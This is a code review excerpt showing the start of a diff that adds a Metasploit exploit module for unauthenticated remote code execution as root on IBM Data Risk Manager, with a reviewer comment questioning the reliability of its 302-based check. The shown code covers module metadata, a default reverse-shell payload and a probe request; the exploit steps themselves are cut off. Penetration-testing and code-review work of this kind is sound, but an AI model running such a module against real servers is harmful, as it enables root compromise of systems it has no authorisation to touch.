modules/exploits/linux/http/ibm_drm_rce.rb

```diff
@@ -0,0 +1,276 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IBM Data Risk Manager Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+      IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by
+      an unauthenticated attacker to achieve remote code execution as root.
+      The first is an unauthenticated bypass, followed by a command injection as the server user
+      and finally abuse of an insecure default password.
+      This module exploits all three vulnerabilities, giving the attacker a root shell.
+      At the time of disclosure, this is a 0 day. Versions 2.0.3 and below are confirmed to be
+      affected, and the latest 2.0.6 is most likely affected too.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', 'TODO' ],
+          [ 'CVE', 'TODO' ],
+          [ 'CVE', 'TODO' ],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [ 'IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)', {} ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 15,
+          'PAYLOAD' => 'linux/x64/shell_reverse_tcp'
+          },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 21 2020'
+    ))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8443]),
+        OptBool.new('SSL', [true, 'Connect with TLS', true]),
+        OptString.new('TARGETURI', [ true,  "Default server path", '/']),
+      ])
+  end
+
+
+  def check
+    # at the moment there is no better way to detect AND be stealthy about it
+    session_id = rand_text_alpha(5..12)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'albatross', 'saml', 'idpSelection'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' =>         session_id,
+        'userName' =>   'admin'
+      }
+    })
+    if res and res.code == 302
```

Comment:
A number of servers will `302` (generally to a `404` page) on unknown URIs. Is there anything about the redirect path that could help determine what this server is? Or perhaps another page that gives some hints?